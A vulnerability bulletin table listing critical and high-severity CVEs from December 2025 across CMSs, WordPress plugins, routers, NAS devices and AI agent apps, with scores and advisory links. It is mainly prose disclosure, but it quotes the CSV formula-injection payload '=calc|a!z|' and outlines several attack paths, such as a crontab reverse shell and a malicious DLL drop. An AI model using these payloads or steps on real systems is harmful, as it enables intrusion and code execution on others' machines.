| Pimpmylog--PimpMyLog | PimpMyLog 1.7.14 contains an improper access control vulnerability that allows remote attackers to create admin accounts without authorization through the configuration endpoint. Attackers can exploit the unsanitized username field to inject malicious JavaScript, create a hidden backdoor account, and potentially access sensitive server-side log information and environmental variables. | 2025-12-16 | 9.8 | CVE-2023-53895 | ExploitDB-51593 Pimp My Log Product Webpage Pimp My Log GitHub Repository VulnCheck Advisory: PimpMyLog 1.7.14 Improper Access Control via Account Creation Endpoint |
| Unknown--Unknown | PodcastGenerator 3.2.9 contains a blind server-side request forgery vulnerability that allows attackers to inject XML in the episode upload form. Attackers can manipulate the 'shortdesc' parameter to trigger external HTTP requests to arbitrary endpoints during podcast episode creation. | 2025-12-16 | 9.8 | CVE-2023-53899 | ExploitDB-51565 Podcast Generator Product Homepage Podcast Generator GitHub Repository VulnCheck Advisory: PodcastGenerator 3.2.9 Blind Server-Side Request Forgery via XML Injection |
| ulicms--Ulicms | UliCMS 2023.1 contains an authentication bypass vulnerability that allows unauthenticated attackers to create admin users through mass assignment in the UserController. Attackers can send a crafted POST request to the admin index.php endpoint with specific parameters to generate an administrative account with full system access. | 2025-12-17 | 9.8 | CVE-2023-53914 | ExploitDB-51486 Archived Product Webpage VulnCheck Advisory: UliCMS 2023.1 Authentication Bypass via Mass Assignment Vulnerability |
| Sitemagic--SitemagicCMS | SitemagicCMS 4.4.3 contains a remote code execution vulnerability that allows attackers to upload malicious PHP files to the files/images directory. Attackers can upload a .phar file with system command execution payload to compromise the web application and execute arbitrary system commands. | 2025-12-17 | 9.8 | CVE-2023-53921 | ExploitDB-51464 Official Product Webpage VulnCheck Advisory: SitemagicCMS 4.4.3 Remote Code Execution via Unrestricted File Upload |
| TinyWebGallery--TinyWebGallery | TinyWebGallery v2.5 contains a remote code execution vulnerability in the admin upload functionality that allows unauthenticated attackers to upload malicious PHP files. Attackers can upload .phar files with embedded system commands to execute arbitrary code on the server by accessing the uploaded file's URL. | 2025-12-17 | 9.8 | CVE-2023-53922 | ExploitDB-51443 Official Product Webpage VulnCheck Advisory: TinyWebGallery v2.5 Remote Code Execution via Unrestricted File Upload |
| Ulicms--Ulicms | UliCMS 2023.1 contains a privilege escalation vulnerability that allows unauthenticated attackers to create administrative accounts through the UserController endpoint. Attackers can send a crafted POST request to /dist/admin/index.php with specific parameters to generate a new admin user with full system access. | 2025-12-17 | 9.8 | CVE-2023-53923 | ExploitDB-51433 Archived Product Webpage VulnCheck Advisory: UliCMS 2023.1 Privilege Escalation via Unauthenticated Admin Account Creation |
| PHPJabbers--Simple CMS | PHPJabbers Simple CMS 5.0 contains a SQL injection vulnerability in the 'column' parameter that allows remote attackers to manipulate database queries. Attackers can inject crafted SQL payloads through the 'column' parameter in the index.php endpoint to potentially extract or modify database information. | 2025-12-17 | 9.8 | CVE-2023-53926 | ExploitDB-51416 Official Product Homepage VulnCheck Advisory: PHPJabbers Simple CMS 5.0 SQL Injection via Column Parameter |
| projectSend--projectSend | ProjectSend r1605 contains an insecure direct object reference vulnerability that allows unauthenticated attackers to download private files by manipulating the download ID parameter. Attackers can access any user's private files by changing the 'id' parameter in the download request to process.php. | 2025-12-17 | 9.8 | CVE-2023-53930 | ExploitDB-51400 Official Product Homepage VulnCheck Advisory: ProjectSend r1605 Insecure Direct Object Reference File Download Vulnerability |
| Easyphp--EasyPHP Webserver | EasyPHP Webserver 14.1 contains an OS command injection vulnerability that allows unauthenticated attackers to execute arbitrary system commands by injecting malicious payloads through the app_service_control parameter. Attackers can send POST requests to /index.php?zone=settings with crafted app_service_control values to execute commands with administrative privileges. | 2025-12-18 | 9.8 | CVE-2023-53941 | ExploitDB-51430 Official Product Homepage VulnCheck Advisory: EasyPHP Webserver 14.1 Remote Code Execution |
| cat03--Lilac-Reloaded | Lilac-Reloaded for Nagios 2.0.8 contains a remote code execution vulnerability in the autodiscovery feature that allows attackers to inject arbitrary commands. Attackers can exploit the lack of input filtering in the nmap_binary parameter to execute a reverse shell by sending a crafted POST request to the autodiscovery endpoint. | 2025-12-19 | 9.8 | CVE-2023-53948 | ExploitDB-51374 Official Product Homepage VulnCheck Advisory: Lilac-Reloaded for Nagios 2.0.8 Remote Code Execution via Autodiscovery |
| innovastudio--WYSIWYG Editor | InnovaStudio WYSIWYG Editor 5.4 contains an unrestricted file upload vulnerability that allows attackers to bypass file extension restrictions through filename manipulation. Attackers can upload malicious ASP shells by using null byte techniques and alternate file extensions to circumvent upload controls in the asset manager. | 2025-12-19 | 9.8 | CVE-2023-53950 | ExploitDB-51362 Official Vendor Homepage VulnCheck Advisory: InnovaStudio WYSIWYG Editor 5.4 Unrestricted File Upload via Filename Manipulation |
| Gauzy--ever gauzy | Ever Gauzy v0.281.9 contains a JWT authentication vulnerability that allows attackers to exploit weak HMAC secret key implementation. Attackers can leverage the exposed JWT token to authenticate and gain unauthorized access with administrative permissions. | 2025-12-19 | 9.8 | CVE-2023-53951 | ExploitDB-51354 Official Product Homepage VulnCheck Advisory: Ever Gauzy v0.281.9 JWT Authentication Weakness via HMAC Secret |
| Kimai--Kimai | Kimai 1.30.10 contains a SameSite cookie vulnerability that allows attackers to steal user session cookies through malicious exploitation. Attackers can trick victims into executing a crafted PHP script that captures and writes session cookie information to a file, enabling potential session hijacking. | 2025-12-19 | 9.8 | CVE-2023-53957 | ExploitDB-51278 Official Product Homepage VulnCheck Advisory: Kimai 1.30.10 SameSite Cookie Vulnerability Session Hijacking |
| filezilla-project--FileZilla Client | FileZilla Client 3.63.1 contains a DLL hijacking vulnerability that allows attackers to execute malicious code by placing a crafted TextShaping.dll in the application directory. Attackers can generate a reverse shell payload using msfvenom and replace the missing DLL to achieve remote code execution when the application launches. | 2025-12-19 | 9.8 | CVE-2023-53959 | ExploitDB-51267 Official Product Homepage VulnCheck Advisory: FileZilla Client 3.63.1 DLL Hijacking via Missing TextShaping.dll |
| Palantir--com.palantir.gotham:glutton | Glutton V1 service endpoints were exposed without any authentication on Gotham stacks. This could have allowed users that did not have any permission to hit the glutton backend directly and read/update/delete data. The affected service has been patched and automatically deployed to all Apollo-managed Gotham Instances. | 2025-12-19 | 9.1 | CVE-2024-49587 | https://palantir.safebase.us/?tcuUid=95e2d805-dd2f-4544-b164-e61100f47b11 |
| snowray--File Uploader for WooCommerce | The File Uploader for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the callback function for the 'add-image-data' REST API endpoint in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to upload arbitrary files to the Uploadcare service and subsequently download them on the affected site's server which may make remote code execution possible. | 2025-12-20 | 9.8 | CVE-2025-13329 | https://www.wordfence.com/threat-intel/vulnerabilities/id/da0f0e1a-bbf8-42a5-b330-b53134488ebd?source=cve https://wordpress.org/plugins/file-uploader-for-woocommerce/ |
| CMSSuperHeroes--Flex Store Users | The Flex Store Users plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.1.0. This is due to the 'fsUserHandle::signup' and the 'fsSellerRole::add_role_seller' functions not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site. Note: The vulnerability can be exploited with the 'fs_type' parameter if the Flex Store Seller plugin is also activated. | 2025-12-20 | 9.8 | CVE-2025-13619 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a2fc40ed-a6af-4069-be63-cb75e98cc98a?source=cve https://themeforest.net/item/autosmart-automotive-car-dealer-wordpress-theme/20322930 |
| Red Hat--Red Hat OpenShift GitOps 1.16 | A flaw was found in OpenShift GitOps. Namespace admins can create ArgoCD Custom Resources (CRs) that trick the system into granting them elevated permissions in other namespaces, including privileged namespaces. An authenticated attacker can then use these elevated permissions to create privileged workloads that run on master nodes, effectively giving them root access to the entire cluster. | 2025-12-15 | 9.1 | CVE-2025-13888 | RHSA-2025:23203 RHSA-2025:23206 RHSA-2025:23207 https://access.redhat.com/security/cve/CVE-2025-13888 RHBZ#2418361 |
| ays-pro--Fox LMS WordPress LMS Plugin | The Fox LMS - WordPress LMS Plugin plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.0.5.1. This is due to the plugin not properly validating the 'role' parameter when creating new users via the `/fox-lms/v1/payments/create-order` REST API endpoint. This makes it possible for unauthenticated attackers to create new user accounts with arbitrary roles, including administrator, leading to complete site compromise. | 2025-12-15 | 9.8 | CVE-2025-14156 | https://www.wordfence.com/threat-intel/vulnerabilities/id/de4f8d45-9522-4a32-bc98-be8dbf3a5cf1?source=cve https://plugins.trac.wordpress.org/changeset?old_path=%2Ffox-lms%2Ftags%2F1.0.5.0%2Fincludes%2Frest%2FPayments.php&new_path=%2Ffox-lms%2Ftags%2F1.0.5.2%2Fincludes%2Frest%2FPayments.php |
| Arcadia Technology, LLC--Crafty Controller | An input neutralization vulnerability in the Webhook Template component of Crafty Controller allows a remote, authenticated attacker to perform remote code execution via Server Side Template Injection. | 2025-12-17 | 9.9 | CVE-2025-14700 | GitLab Issue #646 |
| Shiguangwu--sgwbox N3 | A vulnerability was determined in Shiguangwu sgwbox N3 2.0.25. This affects an unknown function of the component SHARESERVER Feature. This manipulation of the argument params causes command injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14705 | VDB-336422 \| Shiguangwu sgwbox N3 SHARESERVER Feature command injection VDB-336422 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #706974 \| sgwbox N3 NAS V2.0.25 Command Injection https://www.notion.so/sgwbox-NAS-N3-Command-Injection-2be6cf4e528a80d69da5d6d17456a183?source=copy_link |
| Shiguangwu--sgwbox N3 | A vulnerability was identified in Shiguangwu sgwbox N3 2.0.25. This impacts an unknown function of the file /usr/sbin/http_eshell_server of the component NETREBOOT Interface. Such manipulation leads to command injection. The attack can be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14706 | VDB-336423 \| Shiguangwu sgwbox N3 NETREBOOT http_eshell_server command injection VDB-336423 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #706975 \| sgwbox N3 NAS V2.0.25 Command Injection https://www.notion.so/sgwbox-NAS-N3-Command-Injection-2be6cf4e528a807cb619f9d2e1bcda20?source=copy_link |
| Shiguangwu--sgwbox N3 | A security flaw has been discovered in Shiguangwu sgwbox N3 2.0.25. Affected is an unknown function of the file /usr/sbin/http_eshell_server of the component DOCKER Feature. Performing manipulation of the argument params results in command injection. The attack may be initiated remotely. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14707 | VDB-336424 \| Shiguangwu sgwbox N3 DOCKER Feature http_eshell_server command injection VDB-336424 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #706976 \| sgwbox N3 NAS V2.0.25 Command Injection https://www.notion.so/sgwbox-NAS-N3-Command-Injection-2be6cf4e528a805f9b94f7b8799c77a8?source=copy_link |
| Shiguangwu--sgwbox N3 | A weakness has been identified in Shiguangwu sgwbox N3 2.0.25. Affected by this vulnerability is an unknown functionality of the file /usr/sbin/http_eshell_server of the component WIREDCFGGET Interface. Executing manipulation of the argument params can lead to buffer overflow. The attack may be launched remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14708 | VDB-336425 \| Shiguangwu sgwbox N3 WIREDCFGGET http_eshell_server buffer overflow VDB-336425 \| CTI Indicators (IOB, IOC, IOA) Submit #706977 \| sgwbox N3 NAS V2.0.25 Buffer Overflow https://www.notion.so/sgwbox-NAS-N3-Buffer-Overflow-2be6cf4e528a808b9f71fe434929c73b?source=copy_link |
| Shiguangwu--sgwbox N3 | A security vulnerability has been detected in Shiguangwu sgwbox N3 2.0.25. Affected by this issue is some unknown functionality of the file /usr/sbin/http_eshell_server of the component WIRELESSCFGGET Interface. The manipulation of the argument params leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-15 | 9.8 | CVE-2025-14709 | VDB-336426 \| Shiguangwu sgwbox N3 WIRELESSCFGGET http_eshell_server buffer overflow VDB-336426 \| CTI Indicators (IOB, IOC, IOA) Submit #706989 \| sgwbox N3 NAS V2.0.25 Buffer Overflow https://www.notion.so/sgwbox-NAS-N3-Buffer-Overflow-2be6cf4e528a80258b82dee0d6d1ebd1?source=copy_link |
| Tenda--WH450 | A security flaw has been discovered in Tenda WH450 1.0.0.18. This impacts an unknown function of the file /goform/wirelessRestart of the component HTTP Request Handler. The manipulation of the argument GO results in stack-based buffer overflow. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-18 | 9.8 | CVE-2025-14878 | VDB-337369 \| Tenda WH450 HTTP Request wirelessRestart stack-based overflow VDB-337369 \| CTI Indicators (IOB, IOC, IOA) Submit #715357 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/wirelessRestart/wirelessRestart.md https://www.tenda.com.cn/ |
| Tenda--WH450 | A weakness has been identified in Tenda WH450 1.0.0.18. Affected is an unknown function of the file /goform/onSSIDChange of the component HTTP Request Handler. This manipulation of the argument ssid_index causes stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-18 | 9.8 | CVE-2025-14879 | VDB-337370 \| Tenda WH450 HTTP Request onSSIDChange stack-based overflow VDB-337370 \| CTI Indicators (IOB, IOC, IOA) Submit #715362 \| Tenda WH450 V1.0.0.18 Stack-based Buffer Overflow https://github.com/z472421519/BinaryAudit/blob/main/PoC/BOF/Tenda_WH450/onSSIDChange/onSSIDChange.md https://www.tenda.com.cn/ |
| TOTOLINK--T10 | A vulnerability has been found in TOTOLINK T10 4.1.8cu.5083_B20200521. This affects the function sprintf of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument loginAuthUrl leads to stack-based buffer overflow. The attack may be performed from remote. | 2025-12-19 | 9.8 | CVE-2025-14964 | VDB-337599 \| TOTOLINK T10 cstecgi.cgi sprintf stack-based overflow VDB-337599 \| CTI Indicators (IOB, IOC, IOA) Submit #717720 \| TOTOLINK T10 V2_Firmware V4.1.8cu.5083_B20200521 Buffer Overflow https://github.com/JackWesleyy/CVE/blob/main/TOTOLINK_T10_BOC.md https://www.totolink.net/ |
| Restajet Information Technologies Inc.--Online Food Delivery System | Improper Restriction of Excessive Authentication Attempts vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Password Recovery Exploitation. This issue affects Online Food Delivery System: through 19122025. | 2025-12-19 | 9.1 | CVE-2025-1928 | https://www.usom.gov.tr/bildirim/tr-25-0469 |
| NVIDIA--Isaac Lab | NVIDIA Isaac Lab contains a deserialization vulnerability. A successful exploit of this vulnerability might lead to code execution. | 2025-12-16 | 9 | CVE-2025-33210 | https://nvd.nist.gov/vuln/detail/CVE-2025-33210 https://www.cve.org/CVERecord?id=CVE-2025-33210 https://nvidia.custhelp.com/app/answers/detail/a_id/5733 |
| Qualcomm, Inc.--Snapdragon | Memory Corruption when a corrupted ELF image with an oversized file size is read into a buffer without authentication. | 2025-12-18 | 9 | CVE-2025-47372 | https://docs.qualcomm.com/product/publicresources/securitybulletin/december-2025-bulletin.html |
| AmentoTech--Tuturn | Authentication Bypass Using an Alternate Path or Channel vulnerability in AmentoTech Tuturn allows Authentication Abuse. This issue affects Tuturn: from n/a before 3.6. | 2025-12-18 | 9.8 | CVE-2025-64236 | https://vdp.patchstack.com/database/wordpress/plugin/tuturn/vulnerability/wordpress-tuturn-plugin-3-6-broken-authentication-vulnerability?_s_id=cve |
| Microsoft--Azure Cognitive Service for Language | Custom Question Answering Elevation of Privilege Vulnerability | 2025-12-18 | 9.9 | CVE-2025-64663 | Custom Question Answering Elevation of Privilege Vulnerability |
| OpenAgentPlatform--Dive | Dive is an open-source MCP Host Desktop Application that enables integration with function-calling LLMs. A critical Stored Cross-Site Scripting (XSS) vulnerability exists in versions prior to 0.11.1 in the Mermaid diagram rendering component. The application allows the execution of arbitrary JavaScript via `javascript:`. An attacker can exploit this to inject a malicious Model Context Protocol (MCP) server configuration, leading to Remote Code Execution (RCE) on the victim's machine when the node is clicked. Version 0.11.1 fixes the issue. | 2025-12-19 | 9.7 | CVE-2025-66580 | https://github.com/OpenAgentPlatform/Dive/security/advisories/GHSA-xv8m-365j-x6h2 |
| ThinkInAIXYZ--deepchat | DeepChat is an open-source artificial intelligence agent platform that unifies models, tools, and agents. Prior to version 0.5.3, a security vulnerability exists in the Mermaid diagram rendering component that allows arbitrary JavaScript execution. Due to the exposure of the Electron IPC renderer to the DOM, this Cross-Site Scripting (XSS) flaw escalates to full Remote Code Execution (RCE), allowing an attacker to execute arbitrary system commands. Two concurrent issues, unsafe Mermaid configuration and an exposed IPC interface, cause this issue. Version 0.5.3 contains a patch. | 2025-12-16 | 9.7 | CVE-2025-67744 | https://github.com/ThinkInAIXYZ/deepchat/security/advisories/GHSA-w8w8-82pv-5rg9 https://github.com/ThinkInAIXYZ/deepchat/commit/b179d97921af04a0ae1ae68757338dd8b8cbefe7 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In versions prior to 6.5.3, the Database Restore functionality does not validate the content or file extension of uploaded files. As a result, an attacker can upload a web shell file and subsequently upload a .htaccess file to enable direct access to it. Once accessed, the uploaded web shell allows remote code execution (RCE) on the server. Version 6.5.3 fixes the issue. | 2025-12-17 | 9.1 | CVE-2025-68109 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-pqm7-g8px-9r77 |
| ChurchCRM--CRM | ChurchCRM is an open-source church management system. In versions prior to 6.5.3, a SQL injection vulnerability in ChurchCRM's Event Attendee Editor allows authenticated users to execute arbitrary SQL commands, leading to complete database compromise, administrative credential theft, and potential system takeover. The vulnerability enables attackers to extract sensitive member data, authentication credentials, and financial information from the church management system. Version 6.5.3 contains a patch for the issue. | 2025-12-17 | 9.6 | CVE-2025-68112 | https://github.com/ChurchCRM/CRM/security/advisories/GHSA-hxf4-3vhp-wqcq |
| openedx--edx-platform | The Open edX Platform is a learning management platform. Prior to commit 05d0d0936daf82c476617257aa6c35f0cd4ca060, CourseLimitedStaffRole users are able to access and edit courses in studio if they are granted the role on an org rather than on a course, and CourseLimitedStaffRole users are able to list courses they have the role on in studio even though they are not meant to have any access on the studio side for the course. Commit 05d0d0936daf82c476617257aa6c35f0cd4ca060 fixes the issue. | 2025-12-16 | 9.9 | CVE-2025-68270 | https://github.com/openedx/edx-platform/security/advisories/GHSA-rh64-vc2h-7wfj https://github.com/openedx/edx-platform/pull/37772 https://github.com/openedx/edx-platform/pull/37773 https://github.com/openedx/edx-platform/commit/05d0d0936daf82c476617257aa6c35f0cd4ca060 |
| WeblateOrg--weblate | Weblate is a web based localization tool. In versions prior to 5.15.1, it was possible to overwrite Git configuration remotely and override some of its behavior. Version 5.15.1 fixes the issue. | 2025-12-18 | 9.1 | CVE-2025-68398 | https://github.com/WeblateOrg/weblate/security/advisories/GHSA-8vcg-cfxj-p5m3 https://github.com/WeblateOrg/weblate/pull/17330 https://github.com/WeblateOrg/weblate/pull/17345 https://github.com/WeblateOrg/weblate/releases/tag/weblate-5.15.1 |
| nicotsx--zerobyte | Zerobyte is a backup automation tool. Zerobyte versions prior to 0.18.5 and 0.19.0 contain an authentication bypass vulnerability where authentication middleware is not properly applied to API endpoints. This results in certain API endpoints being accessible without valid session credentials. This is dangerous for those who have exposed Zerobyte to be used outside of their internal network. A fix has been applied in both version 0.19.0 and 0.18.5. If immediate upgrade is not possible, restrict network access to the Zerobyte instance to trusted networks only using firewall rules or network segmentation. This is only a temporary mitigation; upgrading is strongly recommended. | 2025-12-17 | 9.1 | CVE-2025-68435 | https://github.com/nicotsx/zerobyte/security/advisories/GHSA-x539-c98q-38gv https://github.com/nicotsx/zerobyte/issues/161 https://github.com/nicotsx/zerobyte/commit/13e080a18967705bd2b4e110e5f7693fdca1c692 |
| Kentico--Xperience | An unrestricted file upload vulnerability in Kentico Xperience allows authenticated users with 'Read data' permissions to upload arbitrary file types via MVC form file uploader components. Attackers can manipulate file names and upload potentially malicious files to the system, enabling unauthorized file uploads. | 2025-12-18 | 8.8 | CVE-2019-25229 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 12.0.29 MVC Forms Unrestricted File Upload |
| Kentico--Xperience | A SQL injection vulnerability in Kentico Xperience allows authenticated editors to inject malicious SQL queries via online marketing macro method parameters. This enables unauthorized database access and potential data manipulation by exploiting macro method input validation weaknesses. | 2025-12-18 | 8.8 | CVE-2021-47711 | Kentico DevNet Hotfixes VulnCheck Advisory: Kentico Xperience <= 13.0.52 Online Marketing Macros SQL Injection |
| spip--spip | Spip 4.1.10 contains a file upload vulnerability that allows attackers to upload malicious SVG files with embedded external links. Attackers can trick administrators into clicking a crafted SVG logo that redirects to a potentially dangerous URL through improper file upload filtering. | 2025-12-16 | 8.8 | CVE-2023-53900 | ExploitDB-51557 SPIP Product Webpage VulnCheck Advisory: Spip 4.1.10 Admin Account Spoofing via Malicious SVG Upload |
| projectSend--projectSend | ProjectSend r1605 contains a CSV injection vulnerability that allows authenticated users to inject malicious formulas into user profile names. Attackers can craft payloads like =calc|a!z| in the name field to trigger code execution when administrators export action logs as CSV files. | 2025-12-17 | 8.8 | CVE-2023-53905 | ExploitDB-51517 Official Product Homepage VulnCheck Advisory: ProjectSend r1605 CSV Injection via User Account Export Functionality |
| Rukovoditel--Rukovoditel | Rukovoditel 3.3.1 contains a CSV injection vulnerability that allows authenticated users to inject malicious formulas into the firstname field. Attackers can craft payloads like =calc|a!z| to trigger code execution when an admin exports customer data as a CSV file. | 2025-12-17 | 8.8 | CVE-2023-53913 | ExploitDB-51490 Official Product Webpage VulnCheck Advisory: Rukovoditel 3.3.1 CSV Injection via User Account Export |
| Ulicms--Ulicms | UliCMS 2023.1-sniffing-vicuna contains a remote code execution vulnerability that allows authenticated attackers to upload PHP files with .phar extension during profile avatar upload. Attackers can trigger code execution by visiting the uploaded file's location, enabling system command execution through maliciously crafted avatar uploads. | 2025-12-17 | 8.8 | CVE-2023-53924 | ExploitDB-51434 Archived Product Webpage VulnCheck Advisory: UliCMS 2023.1-sniffing-vicuna Remote Code Execution via Avatar Upload |
| PHPJabbers--Simple CMS | PHPJabbers Simple CMS 5.0 contains a stored cross-site scripting vulnerability that allows authenticated attackers to inject malicious scripts through section name parameters. Attackers can create sections with embedded JavaScript payloads that will execute when administrators view the sections, potentially enabling client-side code execution. | 2025-12-17 | 8.8 | CVE-2023-53927 | ExploitDB-51415 Official Product Homepage VulnCheck Advisory: PHPJabbers Simple CMS 5.0 Stored Cross-Site Scripting via Section Creation |
| Phpmyfaq--phpMyFAQ | phpMyFAQ 3.1.12 contains a CSV injection vulnerability that allows authenticated users to inject malicious formulas into their profile names. Attackers can modify their user profile name with a payload like 'calc|a!z|' to trigger code execution when an administrator exports user data as a CSV file. | 2025-12-17 | 8.8 | CVE-2023-53929 | ExploitDB-51399 Official Product Homepage VulnCheck Advisory: phpMyFAQ 3.1.12 CSV Injection via User Profile Export |
| s9y--Serendipity | Serendipity 2.4.0 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files with .phar extension. Attackers can upload files with system command payloads to the media upload endpoint and execute arbitrary commands on the server. | 2025-12-17 | 8.8 | CVE-2023-53933 | ExploitDB-51372 Official Product Homepage VulnCheck Advisory: Serendipity 2.4.0 Authenticated Remote Code Execution via File Upload |
| leefish--File Thingie | File Thingie 2.5.7 contains an authenticated file upload vulnerability that allows remote attackers to upload malicious PHP zip archives to the web server. Attackers can create a custom PHP payload, upload and unzip it, and then execute arbitrary system commands through a crafted PHP script with a command parameter. | 2025-12-18 | 8.8 | CVE-2023-53942 | ExploitDB-51436 Product GitHub Repository VulnCheck Advisory: File Thingie 2.5.7 Authenticated Arbitrary File Upload Remote Code Execution |
| brainycp--BrainyCP | BrainyCP 1.0 contains an authenticated remote code execution vulnerability that allows logged-in users to inject arbitrary commands through the crontab configuration interface. Attackers can exploit the crontab endpoint by adding a malicious command that spawns a reverse shell to a specified IP and port. | 2025-12-19 | 8.8 | CVE-2023-53945 | ExploitDB-51357 Official Product Homepage VulnCheck Advisory: BrainyCP 1.0 Remote Code Execution via Authenticated Crontab Manipulation |
| Arcsoft--PhotoStudio | Arcsoft PhotoStudio 6.0.0.172 contains an unquoted service path vulnerability in the ArcSoft Exchange Service that allows local attackers to escalate privileges. Attackers can place a malicious executable in the unquoted path and trigger the service to execute arbitrary code with system-level permissions. | 2025-12-19 | 8.4 | CVE-2023-53946 | ExploitDB-51393 Official Product Homepage VulnCheck Advisory: Arcsoft PhotoStudio 6.0.0.172 Unquoted Service Path Privilege Escalation |
| oscinventory--OCS Inventory NG | OCS Inventory NG 2.3.0.0 contains an unquoted service path vulnerability that allows local attackers to escalate privileges to system level. Attackers can place a malicious executable in the unquoted service path and trigger the service restart to execute code with elevated system privileges. | 2025-12-19 | 8.4 | CVE-2023-53947 | ExploitDB-51389 Official Product Homepage VulnCheck Advisory: OCS Inventory NG 2.3.0.0 Unquoted Service Path Privilege Escalation |
| Aspemail--AspEmail | AspEmail 5.6.0.2 contains a binary permission vulnerability that allows local users to escalate privileges through the Persits Software EmailAgent service. Attackers can exploit full write permissions in the BIN directory to replace the service executable and gain elevated system access. | 2025-12-19 | 8.4 | CVE-2023-53949 | ExploitDB-51380 Official Product Homepage VulnCheck Advisory: AspEmail 5.6.0.2 Local Privilege Escalation via Binary Permission Vulnerability |
| Dotclear--Dotclear | Dotclear 2.25.3 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files with .phar extension through the blog post creation interface. Attackers can upload files containing PHP system commands that execute when the uploaded file is accessed, enabling arbitrary code execution on the server. | 2025-12-19 | 8.8 | CVE-2023-53952 | ExploitDB-51353 Official Product Homepage VulnCheck Advisory: Dotclear 2.25.3 Authenticated Remote Code Execution via File Upload |
| altervista--flatnux | Flatnux 2021-03.25 contains an authenticated file upload vulnerability that allows administrative users to upload arbitrary PHP files through the file manager. Attackers with admin credentials can upload malicious PHP scripts to the web root directory, enabling remote code execution on the server. | 2025-12-19 | 8.8 | CVE-2023-53956 | ExploitDB-51295 Official Product Homepage VulnCheck Advisory: Flatnux 2021-03.25 Authenticated File Upload Remote Code Execution |
| Red Hat--Red Hat Lightspeed (formerly Insights) for Runtimes 1.0 | A flaw was found in runtimes-inventory-rhel8-operator. An internal proxy component is incorrectly configured. Because of this flaw, the proxy attaches the cluster's main administrative credentials to any command it receives, instead of only the specific reports it is supposed to handle. This allows a standard user within the cluster to send unauthorized commands to the management platform, effectively acting with the full permissions of the cluster administrator. This could lead to unauthorized changes to the cluster's configuration or status on the Red Hat platform. | 2025-12-15 | 8.7 | CVE-2025-11393 | RHSA-2025:23236 https://access.redhat.com/security/cve/CVE-2025-11393 RHBZ#2402032 |
| Mitsubishi Electric Corporation--GENESIS64 | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in the software keyboard function (hereinafter referred to as "keypad function") of Mitsubishi Electric GENESIS64 versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.2 CFR3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.2 CFR3 and prior, Mitsubishi Electric MobileHMI versions 10.97.2 CFR3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.2 CFR3 and prior, and Mitsubishi Electric MC Works64 all versions allows a local attacker to execute arbitrary executable files (EXE) when a legitimate user uses the keypad function by tampering with the configuration file for the function. This could allow the attacker to disclose, tamper with, delete, or destroy information stored on the PC where the affected product is installed, or cause a denial-of-service (DoS) condition on the system, through the execution of the EXE. | 2025-12-19 | 8.2 | CVE-2025-11774 | https://jvn.jp/vu/JVNVU97729686/ https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-018_en.pdf |
| smub--Photo Gallery, Sliders, Proofing and Themes NextGEN Gallery | The Photo Gallery, Sliders, Proofing and Themes - NextGEN Gallery plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 3.59.12 via the 'template' shortcode parameter. This is due to insufficient path validation that allows absolute paths to be provided. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, bypassing web server restrictions like .htaccess. Successful exploitation could lead to information disclosure, code execution in the WordPress context, and potential remote code execution if combined with arbitrary file upload capabilities. | 2025-12-18 | 8.8 | CVE-2025-13641 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0a01e1c9-67f4-4cc1-b58b-9cc141889d66?source=cve https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/DisplayType/LegacyTemplateLocator.php#L152 https://plugins.trac.wordpress.org/browser/nextgen-gallery/trunk/src/DisplayType/Controller.php#L369 https://plugins.trac.wordpress.org/changeset/3415575/nextgen-gallery/trunk/src/DisplayType/LegacyTemplateLocator.php?old=3004370&old_path=nextgen-gallery%2Ftrunk%2Fsrc%2FDisplayType%2FLegacyTemplateLocator.php |
| Foxit Software Inc.--Foxit PDF Reader | A local privilege escalation vulnerability exists in the Foxit PDF Reader/Editor Update Service. During plugin installation, incorrect file system permissions are assigned to resources used by the update service. A local attacker with low privileges could modify or replace these resources, which are later executed by the service, resulting in execution of arbitrary code with SYSTEM privileges. | 2025-12-19 | 8.8 | CVE-2025-13941 | https://www.foxit.com/support/security-bulletins.html |
